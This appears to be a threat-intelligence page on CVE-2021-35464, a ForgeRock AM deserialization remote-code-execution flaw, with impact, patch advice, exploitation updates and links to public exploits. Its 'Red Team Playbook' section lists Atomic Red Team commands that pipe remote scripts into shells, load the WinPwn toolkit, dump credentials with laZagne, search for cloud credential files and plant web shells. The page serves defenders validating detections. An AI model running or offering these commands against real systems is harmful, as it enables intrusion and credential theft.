CVE-2021-35464
Overview
This vulnerability is a Java deserialization flaw occurring in the handling of the jato.pageSession parameter within the ForgeRock Access Management server. The root cause lies in unsafe deserialization of untrusted input due to the integration of the Sun ONE Application Framework (JATO) used in Java 8 or earlier versions. The flaw affects multiple web pages of ForgeRock AM versions prior to 7.0, specifically in the processing of serialized session data.
Vulnerability Description
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code remotely on the affected server. This enables full system compromise, including the ability to manipulate data, install malware, or disrupt services. Because no authentication or user interaction is required, the attack surface is broad, allowing attackers to gain unauthorized control over critical infrastructure components running ForgeRock AM.
Solution
ForgeRock has addressed this vulnerability by releasing patches in Access Management version 7.0 and later. Administrators should upgrade to version 7.0 or above as detailed in ForgeRock’s official advisories available at https://bugster.forgerock.org. No specific workarounds are recommended; applying the vendor-provided patch is the primary remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the ForgeRock AM server arises from a critical flaw in the Java deserialization process associated with the jato.pageSession parameter. This issue is rooted in the usage of the Sun ONE Application Framework (JATO) within Java versions 8 and earlier. Java deserialization vulnerabilities are particularly dangerous as they allow an attacker to manipulate serialized objects, potentially leading to remote code execution. In this case, the flaw can be exploited by sending a specially crafted request to the server, which does not require any form of authentication. This lack of authentication significantly lowers the barrier for attackers, making it easier for them to execute malicious code on the server.
The attack vector for this vulnerability is straightforward yet highly effective. An attacker can craft a malicious request targeting the /ccversion/* endpoint of the affected server. By exploiting the deserialization flaw, the attacker can inject arbitrary code that the server will execute. This could lead to a range of malicious outcomes, including the installation of malware, data exfiltration, or even complete server takeover. Given that the exploitation does not necessitate user authentication, it poses a severe risk, as any unauthenticated user can initiate the attack. This ease of access amplifies the potential for widespread exploitation, particularly in environments where the ForgeRock AM server is deployed without adequate security measures.
The real-world impact of this vulnerability can be significant, especially for organizations relying on the ForgeRock AM server for identity and access management. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and loss of customer trust. The business risks associated with such an incident include financial losses due to remediation efforts, potential regulatory fines for data breaches, and reputational damage that could affect customer relationships and market position. Organizations that fail to address this vulnerability may find themselves at a competitive disadvantage, as clients increasingly prioritize security in their vendor selection processes.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating software to the latest versions is crucial, as newer releases often include patches for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the server. Monitoring logs for unusual access patterns or failed authentication attempts can also aid in early detection of potential exploitation attempts. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the deserialization vulnerability in the ForgeRock AM server represents a critical risk that organizations must address promptly. The potential for remote code execution without authentication makes it particularly dangerous, and the implications of a successful attack can be far-reaching. By adopting robust detection and mitigation strategies, organizations can significantly reduce their exposure to this and similar vulnerabilities, thereby enhancing their overall security posture in an increasingly threat-laden digital landscape.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the ForgeRock AM deserialization vulnerability. Our telemetry indicates a doubling in detection frequency, reflecting increased attacker interest and activity. This surge coincides with the continued availability of multiple proof-of-concept exploits and the integration of this vulnerability into widely used penetration testing frameworks, which lowers the barrier for adversaries to execute remote code on vulnerable systems. The persistence of ransomware groups leveraging this flaw underscores its operational impact and the heightened risk to affected organizations. Consequently, the threat level associated with CVE-2021-35464 has intensified, reinforcing its status as a critical security concern that demands vigilant monitoring and response efforts.
Update 2 — June 16, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-35464, accompanied by an increase in the Exploit Prediction Scoring System (EPSS) score reaching its maximum value. This trend reflects growing adversary confidence and operational momentum, likely driven by the sustained availability of multiple proof-of-concept exploits and the integration of this vulnerability into mainstream penetration testing frameworks. Our telemetry indicates that threat actors, including ransomware groups, continue to leverage this unauthenticated remote code execution flaw to compromise ForgeRock Access Management servers, amplifying the potential for impactful intrusions. The elevated EPSS score and increased detection activity underscore a heightened likelihood of exploitation in the wild, signaling an urgent need for defenders to prioritize monitoring and incident response efforts. Consequently, the threat level associated with CVE-2021-35464 has intensified further, reinforcing its critical status within the current threat landscape.
Update 3 — July 06, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2021-35464, with our telemetry indicating increased adversary activity leveraging this unauthenticated remote code execution vulnerability. This uptick coincides with the emergence of additional proof-of-concept exploits and expanded Metasploit module usage, which collectively lower the barrier for threat actors, including ransomware groups, to weaponize the flaw. The persistence of stable but extremely high EPSS scores further confirms sustained attacker interest and operational viability. For defenders, this evolving landscape underscores an elevated risk of compromise through automated or opportunistic attacks, necessitating heightened vigilance in monitoring and detection capabilities. Consequently, the threat level associated with CVE-2021-35464 has escalated, reflecting a more active exploitation environment and reinforcing its critical priority within current security postures.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Forgerock | Access Management | All |
cpe:2.3:a:forgerock:access_management:*:*:*:*:*:*:*:*
|
|
|
Forgerock | Openam | All |
cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
ForgeRock / OpenAM Jato Java Deserialization
exploits/multi/http/cve_2021_35464_forgerock_openam
|
Michael Stepankin, bwatters-r7, Spencer McIntyre +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) | Photubias | webapps | java | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Y4er/openam-CVE-2021-35464
openam-CVE-2021-35464 tomcat 执行命令回显
|
Y4er | 88 | 14 | 2021-07-01 | View |
|
rood8008/CVE-2021-35464
|
rood8008 | 0 | 0 | 2021-08-21 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
58%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-35464 |
| bugster.forgerock.org |
GitHub CVE
x_refsource_MISC
|
https://bugster.forgerock.org |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html |
| backstage.forgerock.com |
GitHub CVE
x_refsource_CONFIRM
|
https://backstage.forgerock.com/knowledge/kb/article/a47894244 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-35464 |